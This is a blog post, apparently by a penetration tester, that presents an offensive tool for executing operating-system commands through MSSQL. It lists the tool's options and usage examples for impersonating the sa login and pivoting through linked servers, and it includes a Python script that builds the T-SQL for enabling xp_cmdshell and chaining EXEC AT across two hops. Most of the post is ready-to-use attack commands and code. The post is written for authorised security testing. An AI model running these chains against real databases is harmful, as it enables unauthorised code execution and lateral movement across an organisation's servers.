November 9, 2023

Code Execution via MSSQL

Written by Gervin Appiah

Background

It is not uncommon to discover MSSQL when testing Windows environments. If you have obtained privileged credentials (a sysadmin login, or a Windows account that maps to one), MSSQL gives you an alternative route to code execution on the servers running it, and on any servers linked to them. That is an opportunity that should not be passed up.

Below I highlight a tool which is essentially a wrapper around Cas Van Cooten's MSSQL code, found on his GitHub:

https://github.com/chvancooten/OSEP-Code-Snippets

Usage

I couldn't come up with a good name for the tool, so I went with the first thing that came into my head: SQLinkedCodeExec.
The tool allows the user to:
  • perform basic enumeration on MSSQL server(s), including linked servers
  • execute commands on the backend OS hosting the MSSQL server(s)

It accepts user supplied credentials or leverages the access token of the logged-on user. The basic syntax is:

SQLinkedCodeExec.exe /t <target> /user <username> /pass <password> <command-to-run>

It currently supports the below options:

/codexec - specifies the code (command) to execute on the MSSQL server
/impersonate - enables login impersonation on the MSSQL server (defaults to sa; see /imp_user and /imp_db)
/imp_db - specifies the database for impersonation, e.g. msdb. This must be used with /imp_user
/imp_user - specifies the login to impersonate on the MSSQL server, e.g. sa
/localexec - enables code execution via xp_cmdshell on the local (target) MSSQL server
/link1exec - enables code execution via xp_cmdshell on a single-hop linked MSSQL server - Link 1
/link2exec - enables code execution via xp_cmdshell on a double-hop linked MSSQL server - Link 2
/lnk - determines if the target MSSQL server has any linked servers
/lnkedt - specifies the linked server connected to our target MSSQL server - Link 1
/lnkedtt - specifies the double-linked server connected to Link 1 - Link 2
/lnkedtcheck1 - enumerates the linked server - Link 1
/lnkedtcheck2 - enumerates the double-linked server - Link 2
/pass - specifies the password to use
/t - specifies the target MSSQL server
/syscreds - ignores the user specified and uses the token of the currently logged-in user
/user - specifies the user account to authenticate as
Some usage examples include:

To show the help menu
SQLinkedCodeExec.exe /? - shows this help menu

To authenticate to a target MSSQL server with username and password
SQLinkedCodeExec.exe /t <target name or IP> /user <username> /pass <password>

To authenticate to a target MSSQL server with the current system token (the username and password are ignored)
SQLinkedCodeExec.exe /t <target name or IP> /user <username> /pass <password> /syscreds true

To execute code on the target MSSQL server
SQLinkedCodeExec.exe /t <target name or IP> /user <username> /pass <password> /localexec true /codexec < Whatever - command - goes - here >

To check if the target MSSQL server has any links to another MSSQL server
SQLinkedCodeExec.exe /t <target name or IP> /syscreds true /lnk true

To execute code on a linked MSSQL server instance (sqlserv2) - Link 1
SQLinkedCodeExec.exe /t <target name or IP> /syscreds true /link1exec true /lnkedt sqlserv2 /codexec <powershell - enc...>

To impersonate the sa account and execute code on a linked MSSQL server instance (sqlserv2) - Link 1
SQLinkedCodeExec.exe /t <target name or IP> /syscreds true /lnk true /impersonate true /imp_user sa /imp_db msdb /codexec <powershell - enc>

To enumerate a linked MSSQL server (sqlserv2) for additional links to other instances - Link 1
SQLinkedCodeExec.exe /t <target name or IP> /syscreds true /lnkedt sqlserv2 /lnkedtcheck1 true

To check the double-linked server (sqlserv3) for the user we are operating as - Link 2
SQLinkedCodeExec.exe /t <target name or IP> /syscreds true /lnkedt sqlserv2 /lnkedtt sqlserv3 /lnkedtcheck2 true

To execute code on the double-linked server (sqlserv3) - Link 2
SQLinkedCodeExec.exe /t <target name or IP> /user someguy /pass somepass /syscreds true /lnk true /link2exec true /lnkedt sqlserv2 /lnkedtt sqlserv3 /codexec <powershell - enc....>
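The options above map onto a handful of T-SQL statements: a whoami-style check, a query of the linked server list, EXECUTE AS LOGIN for impersonation, sp_configure to switch on xp_cmdshell, and EXEC ('...') AT [link] to push a statement across a hop. The part that trips people up on the double-hop case is the quoting: every EXEC AT wrapper turns the inner statement into a string literal, so single quotes have to be doubled once per hop. The following is an added example, not code from SQLinkedCodeExec or from Cas Van Cooten's snippets; it builds the statements for any number of hops and never connects to anything, so you can feed its output to whatever client you use. The server names sqlserv2 and sqlserv3 and the command are placeholders, as in the examples above.

```python
"""Build the T-SQL behind the enumeration / xp_cmdshell / linked-server steps.

Added example (not the SQLinkedCodeExec source). It only produces statement
strings; executing them against a real server is left to the client.
"""
from typing import List, Optional

# Enumeration statements, usable as-is on the target or wrapped for a hop.
WHO_AM_I = (
    "SELECT SYSTEM_USER AS login_name, "
    "IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;"
)
LIST_LINKS = (
    "SELECT srvname, srvproduct, providername, datasource "
    "FROM master..sysservers WHERE srvname <> @@SERVERNAME;"
)
# Logins the current login has been granted IMPERSONATE on.
IMPERSONATABLE = (
    "SELECT DISTINCT b.name FROM sys.server_permissions a "
    "JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id "
    "WHERE a.permission_name = 'IMPERSONATE';"
)


def q(s: str) -> str:
    """Double single quotes so s can be embedded in a T-SQL string literal."""
    return s.replace("'", "''")


def at_hops(sql: str, hops: List[str]) -> str:
    """Wrap sql in EXEC ('...') AT [link] once per hop.

    hops is the path from the server we are connected to outward, e.g.
    ["sqlserv2", "sqlserv3"]: the statement runs on sqlserv3, sent via
    sqlserv2. Wrapping starts at the far end so the outermost EXEC AT names
    the first hop. Quotes are doubled at every level, which is why a
    two-hop payload carries quadrupled quotes around the inner literal.
    EXEC AT needs the 'rpc out' option enabled on each linked server; with
    it disabled, fall back to OPENQUERY for SELECTs only.
    """
    for link in reversed(hops):
        sql = f"EXEC ('{q(sql)}') AT [{link}]"
    return sql


def xp_cmdshell_chain(
    command: str, hops: List[str], impersonate: Optional[str] = None
) -> List[str]:
    """Statements to enable xp_cmdshell and run command on the last hop.

    impersonate, if given, is a login to EXECUTE AS on the server we are
    connected to (the /impersonate + /imp_user step). Who we become on the
    far side of each link is decided by that link's login mapping, not by
    this statement, so check with at_hops(WHO_AM_I, hops) first.
    """
    stmts: List[str] = []
    if impersonate:
        stmts.append(f"EXECUTE AS LOGIN = '{q(impersonate)}';")
    for sql in (
        "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;",
        "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;",
        f"EXEC master..xp_cmdshell '{q(command)}';",
    ):
        stmts.append(at_hops(sql, hops))
    return stmts


if __name__ == "__main__":
    # Placeholder link names and command, mirroring the examples in the post.
    path = ["sqlserv2", "sqlserv3"]
    print(LIST_LINKS)                       # /lnk on the target
    print(at_hops(LIST_LINKS, path[:1]))    # /lnkedtcheck1 on sqlserv2
    print(at_hops(WHO_AM_I, path))          # /lnkedtcheck2 on sqlserv3
    for stmt in xp_cmdshell_chain("whoami", path, impersonate="sa"):
        print(stmt)                         # /link2exec with /imp_user sa
```

Run each statement in order with your client of choice; the sp_configure calls are a persistent change on the far server, so note them for cleanup, and remember that enabling xp_cmdshell is a well-known detection trigger.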

The source code for the tool can be found on my GitHub:
https://github.com/anans3-gh/SQLinkedCodeExec

YouTube Video

Below is a link to see the tool in action on my YouTube channel.
